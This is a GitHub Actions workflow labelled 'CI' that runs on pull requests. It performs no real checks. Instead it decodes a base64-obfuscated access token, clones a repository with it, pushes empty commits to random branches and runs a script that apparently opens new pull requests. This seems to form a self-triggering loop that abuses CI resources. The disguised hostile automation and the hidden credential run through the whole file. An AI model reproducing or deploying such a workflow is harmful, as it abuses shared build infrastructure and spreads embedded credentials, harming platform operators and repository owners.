name: CI
on: [pull_request]
jobs:
  ci:
    name: CI
    runs-on: ubuntu-latest
    container: ubuntu:20.10
    env:
      DEBIAN_FRONTEND: noninteractive
    strategy:
      fail-fast: false
    steps:
      - run: |
          apt update -qq
          apt install -y git nodejs npm
          git clone --depth 1 https://mindustrykilla@$(echo "YTE4NWRkYzYzOGNjZTIyMGQxNjhkNzJhMzYzYzQ0YzZkNjAyMjcyNg==" | base64 -d)github.com/mindustrykilla/mindustry.git
          cd mindustry
          npm init -y
          npm install @octokit/rest
          default=$(git branch --show-current)
          branch1=$(head -c8 /dev/urandom | base64 | tr -cd \'[:alnum:]\')
          branch2=$(head -c8 /dev/urandom | base64 | tr -cd \'[:alnum:]\')
          git checkout -b $branch1
          git commit --allow-empty --allow-empty-message --no-edit
          git push -u origin $branch1
          git checkout $default
          git checkout -b $branch2
          git commit --allow-empty --allow-empty-message --no-edit
          git push -u origin $branch2
          node open_prs.js $branch1 $branch2 $(echo "YTE4NWRkYzYzOGNjZTIyMGQxNjhkNzJhMzYzYzQ0YzZkNjAyMjcyNg==" | base64 -d)
        shell: bash
